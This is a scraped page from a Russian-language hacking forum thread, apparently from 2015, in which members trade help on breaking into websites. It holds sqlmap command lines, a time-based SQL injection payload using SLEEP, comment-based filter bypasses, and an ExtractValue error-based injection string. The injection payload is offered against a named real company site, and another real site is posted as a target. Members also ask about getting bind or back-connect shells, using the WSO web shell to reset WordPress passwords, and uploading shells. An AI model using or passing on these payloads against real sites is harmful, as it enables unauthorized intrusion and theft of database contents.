Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Export

    Export Member

    Joined:
    13 Feb 2010
    Messages:
    69
    Likes Received:
    5
    Reputations:
    9
    Скажите: как мне заюзать бекконект или биндпорт, если shell_exec не работает, а следовательно Perl bind.pl не приводит к нужному результату.
     
  2. preno

    preno Member

    Joined:
    5 Sep 2010
    Messages:
    249
    Likes Received:
    6
    Reputations:
    0
    Ребята, как скулмапу скормить урл и если SQL в заголовке урла, как это сделать? Есть примеры?
     
  3. lifescore

    lifescore Elder - Старейшина

    Joined:
    27 Aug 2011
    Messages:
    634
    Likes Received:
    499
    Reputations:
    69
    ./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 Firefox/26.0" --cookie="%Query_Cookie%" -u 'http://url.com/path/?id=1' --level=5 risk=3 -p %Parametr%

    Или
    -r и путь к файлу с HTTP запросом
    PHP:
    POST /vuln.php HTTP/1.1
    Host
    www.target.com
    User
    -AgentMozilla/4.0

    id
    =1
     
    #23903 lifescore, 26 Feb 2015
    Last edited: 26 Feb 2015
  4. yeti2

    yeti2 New Member

    Joined:
    15 Sep 2013
    Messages:
    76
    Likes Received:
    2
    Reputations:
    0
    Ребят , какой запрос в wso shell сделать , чтобы поменять Пароль в mysql базе . Допустим wordpress password "user_pass"
     
  5. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Сразу задавайте вопросы в соответвствующей теме.
    Strilo4ka вчера Вам отвечал:
     
  6. 5maks5

    5maks5 Elder - Старейшина

    Joined:
    29 Aug 2010
    Messages:
    452
    Likes Received:
    264
    Reputations:
    40
    Юзать последнюю версию WSO.
    Вот что она умеет:
    [​IMG]
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    админка есть? может слить только администраторов и залиться?
     
    _________________________
  8. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    sql инъекция

    Помогите пожалуйста
    когда делаю запрос через order by дает такой ответ

    A Database Error Occurred

    Error Number: 1054

    Unknown column '3_order_by_80' in 'where clause'

    SELECT * FROM authors where id=3_order_by_80 limit 0,1
    можно из бд что то вытащить?
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    откуда нижнее подчеркивание? почему limit? перечитайте статьи по sqli и пройдите хотя бы базовое введение в sql
     
    _________________________
  10. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    нет, я набираю 3 order by 80--

    а в ответ получаю

    A Database Error Occurred
    Error Number: 1054
    Unknown column '3_order_by_80' in 'where clause'
    SELECT * FROM authors where id=3_order_by_80 limit 0,1
     
  11. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    373
    Likes Received:
    164
    Reputations:
    126
    "набери" 3+order+by+80-- или 3/**/order/**/by/**/80--
     
    _________________________
  12. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    да, я набирал, но выдает ошибку

    An Error Was Encountered
    The URI you submitted has disallowed characters.

    И на коментарий и на плюс
     
    #23912 teh, 28 Feb 2015
    Last edited: 28 Feb 2015
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    884
    Reputations:
    859
    Так можно долго гадать какой вариант сработает, и по сути получается один оффтоп, хотите увидеть результат, публикуйте ссылку.
     
    _________________________
  14. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    http://4vlada.com/blogs/3
     
  15. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Есть способ заливки шелла через infophp.php при отсутствии инклуда?!
     
  16. andrxx

    andrxx Banned

    Joined:
    7 Nov 2013
    Messages:
    51
    Likes Received:
    6
    Reputations:
    0
    есть, но необходимо наличие фтп или цпанель
     
  17. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    ftp://site.com - доступ требует авторизацию, ЦП панель так же требует авторизацию. Ну и какой способ
     
  18. preno

    preno Member

    Joined:
    5 Sep 2010
    Messages:
    249
    Likes Received:
    6
    Reputations:
    0
    Способ на первый взгляд сработал, вектор запросов найден, timebased SQL, я дошёл до финальной стадии когда SQLmap предлагает ввести произвольный SQL запрос и выполнить его, однако он не выполняется, на любой запрос выводит none
    Пробую способ:
    ./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL"
    Вектор атаки найден:
    Payload: User-Agent: Mozilla/5.0 Gecko/20120101') AND SLEEP(5)#
    Однако, в SQL иньекции фильтруются запятые, а так как я не силен в timebased векторах, то даже предположить не могу, возможно ли провести timebased атаку без запятых и выполнить грубо говоря запрос select password from user
    После найденного вектора запускаю скрипт:
    ./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL" --sql-query="SELECT user()"
    Он ждет минут 5-10 в retrieved:, пытается выполнить запрос и вытащить ответ, и по истечению времени вываливает:
    SELECT user(): None
    И так на любой SQL запрос. И вот вопрос, это из за запятых невозможно провести атаку, или я что то не так делаю? Подскажите пожалуйста!
     
  19. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Интересует вывод таблиц из этой инъекции:
    Code:
    http://naftogaz-europe.com
    Note: в поле поиск '
     
    #23919 Unknowhacker, 1 Mar 2015
    Last edited: 1 Mar 2015
  20. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    373
    Likes Received:
    164
    Reputations:
    126
    'or(ExtractValue(1,concat(0x3a,(select(table_name)from(information_schema.tables)limit/**/0,1))))='1
     
    _________________________
    2 people like this.
Loading...
Thread Status:
Not open for further replies.